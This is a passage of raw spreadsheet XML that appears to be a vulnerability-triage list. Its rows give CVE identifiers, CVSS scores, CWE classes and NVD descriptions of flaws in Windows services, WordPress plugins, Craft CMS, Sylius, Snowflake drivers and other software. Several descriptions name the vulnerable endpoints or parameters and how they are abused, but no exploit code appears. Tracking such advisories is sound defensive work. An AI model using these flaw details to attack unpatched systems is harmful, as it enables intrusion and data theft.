t="inlineStr"><is><t>CVE-2026-86082</t></is></c><c r="D1162" s="5" t="n"><v>6.5</v></c><c r="E1162" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1162" s="5" t="inlineStr" /><c r="H1162" s="5" t="n"><v>0.002</v></c><c r="I1162" s="5" t="inlineStr" /><c r="J1162" s="5" t="inlineStr" /><c r="K1162" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1162" s="5" t="inlineStr" /><c r="M1162" s="5" t="inlineStr" /><c r="N1162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1162" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1162" s="5" t="inlineStr" /><c r="R1162" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1162" s="5" t="inlineStr"><is><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is></c><c r="T1162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86082</t></is></c></row><row r="1163"><c r="A1163" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1163" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1163" s="5" t="inlineStr"><is><t>CVE-2026-86550</t></is></c><c r="D1163" s="5" t="n"><v>6.5</v></c><c r="E1163" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1163" s="5" t="inlineStr"><is><t>psirt@zte.com.cn</t></is></c><c r="G1163" s="5" t="inlineStr" /><c r="H1163" s="5" t="n"><v>0.003</v></c><c r="I1163" s="5" t="inlineStr" /><c r="J1163" s="5" t="inlineStr" /><c r="K1163" s="5" t="inlineStr" /><c r="L1163" s="5" t="inlineStr" /><c r="M1163" s="5" t="inlineStr" /><c r="N1163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1163" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1163" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1163" s="5" t="inlineStr" /><c r="R1163" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1163" s="5" t="inlineStr"><is><t>NuBrowser lacks protocol whitelist validation for the S.browser_fallback_url field of intent://, allowing attackers to inject javascript: URLs via 302 redirects. This results in a universal cross‑site scripting (UXSS) vulnerability that enables script execution within the origin of arbitrary websites.</t></is></c><c r="T1163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86550</t></is></c></row><row r="1164"><c r="A1164" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1164" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1164" s="5" t="inlineStr"><is><t>CVE-2026-86597</t></is></c><c r="D1164" s="5" t="n"><v>6.5</v></c><c r="E1164" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1164" s="5" t="inlineStr"><is><t>412d305a-227d-44f9-a262-a31ba44f2aea</t></is></c><c r="G1164" s="5" t="inlineStr" /><c r="H1164" s="5" t="n"><v>0.001</v></c><c r="I1164" s="5" t="inlineStr" /><c r="J1164" s="5" t="inlineStr" /><c r="K1164" s="5" t="inlineStr" /><c r="L1164" s="5" t="inlineStr" /><c r="M1164" s="5" t="inlineStr" /><c r="N1164" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1164" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1164" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1164" s="5" t="inlineStr" /><c r="R1164" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S1164" s="5" t="inlineStr"><is><t>Insertion of sensitive information into log files in the Snowflake Python, Go, JDBC, Node.js, PHP PDO, and ODBC drivers allowed authentication tokens, query-result encryption keys, pre-signed cloud-storage URLs, and SAML assertions to be written to diagnostic logs in circumstances where the available log redaction did not cover all affected log paths and data types. An attacker with read access to the log destination, whether the local filesystem, a log aggregation service, or a CI/CD artifact store, could obtain credentials and decryption keys that, if still valid at the time of access, could be used to authenticate to the corresponding Snowflake account or cloud-storage object. Successful exploitation requires read access to the log destination, and impact is bounded by credential lifetime and object scope. The fix is available in Snowflake Connector for Python v4.7.3, Snowflake Go Driver v2.2.0, Snowflake JDBC Driver v4.3.4 (including the snowflake-jdbc-fips and snowflake-jdbc-thin), Snowflake Node.js Driver v3.3.0, Snowflake PHP PDO Driver v4.2.0, and Snowflake ODBC Driver v3.20.0. Users must manually upgrade and should securely delete previously generated diagnostic logs containing sensitive information where retention is not required.</t></is></c><c r="T1164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86597</t></is></c></row><row r="1165"><c r="A1165" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1165" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1165" s="5" t="inlineStr"><is><t>CVE-2026-86726</t></is></c><c r="D1165" s="5" t="n"><v>6.5</v></c><c r="E1165" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1165" s="5" t="inlineStr" /><c r="H1165" s="5" t="n"><v>0.003</v></c><c r="I1165" s="5" t="inlineStr" /><c r="J1165" s="5" t="inlineStr" /><c r="K1165" s="5" t="inlineStr" /><c r="L1165" s="5" t="inlineStr" /><c r="M1165" s="5" t="inlineStr" /><c r="N1165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1165" s="5" t="inlineStr" /><c r="R1165" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S1165" s="5" t="inlineStr"><is><t>AVideo through 29.0 contains an information disclosure vulnerability in restreamsActive.json.php that allows authenticated streamers to enumerate source stream keys and identities of all other streamers' active restreams. The endpoint fails to filter results by user ownership, exposing sensitive transmission credentials and streamer identity across all accounts to any user with streaming capability.</t></is></c><c r="T1165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86726</t></is></c></row><row r="1166"><c r="A1166" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1166" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1166" s="5" t="inlineStr"><is><t>CVE-2026-86731</t></is></c><c r="D1166" s="5" t="n"><v>6.5</v></c><c r="E1166" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1166" s="5" t="inlineStr" /><c r="H1166" s="5" t="n"><v>0.002</v></c><c r="I1166" s="5" t="inlineStr" /><c r="J1166" s="5" t="inlineStr" /><c r="K1166" s="5" t="inlineStr" /><c r="L1166" s="5" t="inlineStr" /><c r="M1166" s="5" t="inlineStr" /><c r="N1166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1166" s="5" t="inlineStr" /><c r="R1166" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1166" s="5" t="inlineStr"><is><t>Craft CMS versions 5.0.0-RC1 through 5.10.11 are missing an admin-target guard in UsersController::actionActivateUser (the users/activate-user action). While the action requires the administrateUsers permission, it does not call requireAdmin() when the targeted user is an administrator, unlike the mirror action actionDeactivateUser. As a result, an authenticated control panel user who is not an administrator but holds the administrateUsers permission can activate a pending or deliberately deactivated administrator account, which can lead to permission escalation when combined with resetting that account's password. The issue is fixed in Craft CMS 5.10.12.</t></is></c><c r="T1166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86731</t></is></c></row><row r="1167"><c r="A1167" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1167" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1167" s="5" t="inlineStr"><is><t>CVE-2026-12230</t></is></c><c r="D1167" s="5" t="n"><v>6.4</v></c><c r="E1167" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1167" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1167" s="5" t="inlineStr" /><c r="H1167" s="5" t="n"><v>0.002</v></c><c r="I1167" s="5" t="inlineStr" /><c r="J1167" s="5" t="inlineStr" /><c r="K1167" s="5" t="inlineStr" /><c r="L1167" s="5" t="inlineStr" /><c r="M1167" s="5" t="inlineStr" /><c r="N1167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1167" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1167" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1167" s="5" t="inlineStr" /><c r="R1167" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1167" s="5" t="inlineStr"><is><t>The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'layout_custom_css' parameter in all versions up to, and including, 4.3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t></is></c><c r="T1167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12230</t></is></c></row><row r="1168"><c r="A1168" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1168" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1168" s="5" t="inlineStr"><is><t>CVE-2026-33388</t></is></c><c r="D1168" s="5" t="n"><v>6.4</v></c><c r="E1168" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1168" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1168" s="5" t="inlineStr" /><c r="H1168" s="5" t="n"><v>0.003</v></c><c r="I1168" s="5" t="inlineStr" /><c r="J1168" s="5" t="inlineStr" /><c r="K1168" s="5" t="inlineStr" /><c r="L1168" s="5" t="inlineStr" /><c r="M1168" s="5" t="inlineStr" /><c r="N1168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1168" s="5" t="inlineStr" /><c r="R1168" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1168" s="5" t="inlineStr"><is><t>An access control vulnerability was discovered in the Credentials Manager functionality due to insufficient validation of user privileges. A remote authenticated user with limited privileges can view a limited subset of the available entries in the Credentials Manager. The actual credential values are not directly visible, but the user can delete entries or edit their properties. An attacker who deletes or edits an entry can disrupt authentication for dependent devices, and one who manipulates an entry's configuration may be able to indirectly obtain the credentials.</t></is></c><c r="T1168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33388</t></is></c></row><row r="1169"><c r="A1169" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1169" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1169" s="5" t="inlineStr"><is><t>CVE-2026-69874</t></is></c><c r="D1169" s="5" t="n"><v>6.4</v></c><c r="E1169" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1169" s="5" t="inlineStr" /><c r="H1169" s="5" t="n"><v>0.003</v></c><c r="I1169" s="5" t="inlineStr" /><c r="J1169" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1169"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169" s="5" t="inlineStr" /><c r="M1169" s="5" t="inlineStr" /><c r="N1169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1169" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1169" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1169" s="5" t="inlineStr" /><c r="R1169" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1169" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t></is></c></row><row r="1170"><c r="A1170" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1170" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1170" s="5" t="inlineStr"><is><t>CVE-2026-69878</t></is></c><c r="D1170" s="5" t="n"><v>6.4</v></c><c r="E1170" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1170" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1170" s="5" t="inlineStr" /><c r="H1170" s="5" t="n"><v>0.003</v></c><c r="I1170" s="5" t="inlineStr" /><c r="J1170" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1170" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1170" s="5" t="inlineStr" /><c r="M1170" s="5" t="inlineStr" /><c r="N1170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1170" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1170" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1170" s="5" t="inlineStr" /><c r="R1170" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1170" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69878</t></is></c></row><row r="1171"><c r="A1171" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1171" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1171" s="5" t="inlineStr"><is><t>CVE-2026-70582</t></is></c><c r="D1171" s="5" t="n"><v>6.4</v></c><c r="E1171" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1171" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1171" s="5" t="inlineStr" /><c r="H1171" s="5" t="n"><v>0.002</v></c><c r="I1171" s="5" t="inlineStr" /><c r="J1171" s="5" t="inlineStr" /><c r="K1171" s="5" t="inlineStr" /><c r="L1171" s="5" t="inlineStr" /><c r="M1171" s="5" t="inlineStr" /><c r="N1171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1171" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1171" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1171" s="5" t="inlineStr" /><c r="R1171" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1171" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70582</t></is></c></row><row r="1172"><c r="A1172" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1172" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1172" s="5" t="inlineStr"><is><t>CVE-2026-71338</t></is></c><c r="D1172" s="5" t="n"><v>6.4</v></c><c r="E1172" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1172" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1172" s="5" t="inlineStr" /><c r="H1172" s="5" t="n"><v>0.003</v></c><c r="I1172" s="5" t="inlineStr" /><c r="J1172" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1172" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1172" s="5" t="inlineStr" /><c r="M1172" s="5" t="inlineStr" /><c r="N1172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1172" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1172" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1172" s="5" t="inlineStr" /><c r="R1172" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1172" s="5" t="inlineStr"><is><t>Double free in Windows Failover Cluster allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71338</t></is></c></row><row r="1173"><c r="A1173" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1173" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1173" s="5" t="inlineStr"><is><t>CVE-2026-72947</t></is></c><c r="D1173" s="5" t="n"><v>6.4</v></c><c r="E1173" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1173" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1173" s="5" t="inlineStr" /><c r="H1173" s="5" t="n"><v>0.003</v></c><c r="I1173" s="5" t="inlineStr" /><c r="J1173" s="5" t="inlineStr" /><c r="K1173" s="5" t="inlineStr" /><c r="L1173" s="5" t="inlineStr" /><c r="M1173" s="5" t="inlineStr" /><c r="N1173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1173" s="5" t="inlineStr" /><c r="R1173" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1173" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72947</t></is></c></row><row r="1174"><c r="A1174" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1174" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1174" s="5" t="inlineStr"><is><t>CVE-2026-76931</t></is></c><c r="D1174" s="5" t="n"><v>6.4</v></c><c r="E1174" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1174" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1174" s="5" t="inlineStr" /><c r="H1174" s="5" t="n"><v>0.002</v></c><c r="I1174" s="5" t="inlineStr" /><c r="J1174" s="5" t="inlineStr" /><c r="K1174" s="5" t="inlineStr" /><c r="L1174" s="5" t="inlineStr" /><c r="M1174" s="5" t="inlineStr" /><c r="N1174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1174" s="5" t="inlineStr" /><c r="R1174" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1174" s="5" t="inlineStr"><is><t>The Zephyr Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘message’ parameter in all versions up to, and including, 3.3.205 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability can only be exploited when the 'Directly link to project' plugin setting is disabled.</t></is></c><c r="T1174" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76931</t></is></c></row><row r="1175"><c r="A1175" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1175" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1175" s="5" t="inlineStr"><is><t>CVE-2026-77887</t></is></c><c r="D1175" s="5" t="n"><v>6.4</v></c><c r="E1175" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1175" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1175" s="5" t="inlineStr" /><c r="H1175" s="5" t="n"><v>0.002</v></c><c r="I1175" s="5" t="inlineStr" /><c r="J1175" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1175" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1175" s="5" t="inlineStr" /><c r="M1175" s="5" t="inlineStr" /><c r="N1175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1175" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1175" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1175" s="5" t="inlineStr" /><c r="R1175" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1175" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t></is></c></row><row r="1176"><c r="A1176" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1176" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1176" s="5" t="inlineStr"><is><t>CVE-2026-77891</t></is></c><c r="D1176" s="5" t="n"><v>6.4</v></c><c r="E1176" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1176" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1176" s="5" t="inlineStr" /><c r="H1176" s="5" t="n"><v>0.002</v></c><c r="I1176" s="5" t="inlineStr" /><c r="J1176" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1176" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1176" s="5" t="inlineStr" /><c r="M1176" s="5" t="inlineStr" /><c r="N1176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1176" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1176" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1176" s="5" t="inlineStr" /><c r="R1176" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1176" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t></is></c></row><row r="1177"><c r="A1177" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1177" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1177" s="5" t="inlineStr"><is><t>CVE-2026-53639</t></is></c><c r="D1177" s="5" t="n"><v>6.3</v></c><c r="E1177" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1177" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1177" s="5" t="inlineStr" /><c r="H1177" s="5" t="n"><v>0.005</v></c><c r="I1177" s="5" t="inlineStr" /><c r="J1177" s="5" t="inlineStr" /><c r="K1177" s="5" t="inlineStr" /><c r="L1177" s="5" t="inlineStr" /><c r="M1177" s="5" t="inlineStr" /><c r="N1177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1177" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1177" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1177" s="5" t="inlineStr" /><c r="R1177" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1177" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Starting in version 2.0.0 and prior to version 2.0.18, 2.1.15, and 2.2.6, the `GET /api/v2/shop/payment-requests/{hash}` and `PUT /api/v2/shop/payment-requests/{hash}` endpoints look up the payment request solely by the hash from the URL. No ownership check is performed against the authenticated customer or the underlying order. An attacker who obtains a payment request hash can read the payment request and, through the `payment` IRI in the response, recover the underlying order's `tokenValue` (which itself grants access to the full order, items, addresses, customer email, totals); and/or update the payment request payload (e.g. `target_path`, `after_path`). These fields are used by the front-end controller to redirect the user after the payment, so an attacker can flip them to an attacker-controlled URL and intercept the buyer. The hash is a UUID, so it has to be obtained out-of-band (logs, shared links, referrer headers, a co-located client), but once it is known no other credential is required, neither authentication nor knowledge of the order token. The creation endpoint `POST /api/v2/shop/orders/{tokenValue}/payment-requests` shares the same flaw: it resolves the target order solely from the `tokenValue` in the URL without verifying that the caller owns the order. The issue is fixed in versions 2.0.18, 2.1.15, and 2.2.6. As a workaround, add a query extension that filters the `GET` operation; decorate the `PUT` state provider, guard the `POST` creation endpoint with a command-bus middleware, and wire the services.</t></is></c><c r="T1177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53639</t></is></c></row><row r="1178"><c r="A1178" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1178" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1178" s="5" t="inlineStr"><is><t>CVE-2026-81824</t></is></c><c r="D1178" s="5" t="n"><v>6.3</v></c><c r="E1178" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1178" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G1178" s="5" t="inlineStr" /><c r="H1178" s="5" t="n"><v>0.002</v></c><c r="I1178" s="5" t="inlineStr" /><c r="J1178" s="5" t="inlineStr" /><c r="K1178" s="5" t="inlineStr" /><c r="L1178" s="5" t="inlineStr" /><c r="M1178" s="5" t="inlineStr" /><c r="N1178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1178" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1178" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1178" s="5" t="inlineStr" /><c r="R1178" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1178" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant to run arbitrary JavaScript code in a browser session of a PIMBoards user who was socially engineered to click on a malicious link.</t></is></c><c r="T1178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81824</t></is></c></row><row r="1179"><c r="A1179" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1179" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1179" s="5" t="inlineStr"><is><t>CVE-2026-81904</t></is></c><c r="D1179" s="5" t="n"><v>6.3</v></c><c r="E1179" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1179" s="5" t="inlineStr"><is><t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t></is></c><c r="G1179" s="5" t="inlineStr" /><c r="H1179" s="5" t="n"><v>0.003</v></c><c r="I1179" s="5" t="inlineStr" /><c r="J1179" s="5" t="inlineStr" /><c r="K1179" s="5" t="inlineStr" /><c r="L1179" s="5" t="inlineStr" /><c r="M1179" s="5" t="inlineStr" /><c r="N1179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1179" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1179" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1179" s="5" t="inlineStr" /><c r="R1179" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1179" s="5" t="inlineStr"><is><t>Concrete CMS below 9.5.3 registered view assets for every sub-block of a Stack, Container, or layout area without checking whether the requesting user could view that sub-block. An unauthenticated visitor could recover configuration values emitted by a restricted sub-block's asset registration — such as a site's configured Google Maps API key — from any public page embedding an affected Stack, Container, or layout area, despite the block-level permission restriction. Any sub-block type whose asset or header hooks output configuration values is affected.  The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting.</t></is></c><c r="T1179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81904</t></is></c></row><row r="1180"><c r="A1180" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1180" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1180" s="5" t="inlineStr"><is><t>CVE-2026-81994</t></is></c><c r="D1180" s="5" t="n"><v>6.3</v></c><c r="E1180" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1180" s="5" t="inlineStr" /><c r="H1180" s="5" t="n"><v>0.003</v></c><c r="I1180" s="5" t="inlineStr" /><c r="J1180" s="5" t="inlineStr" /><c r="K1180" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1180" s="5" t="inlineStr" /><c r="M1180" s="5" t="inlineStr" /><c r="N1180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1180" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1180" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1180" s="5" t="inlineStr" /><c r="R1180" s="5" 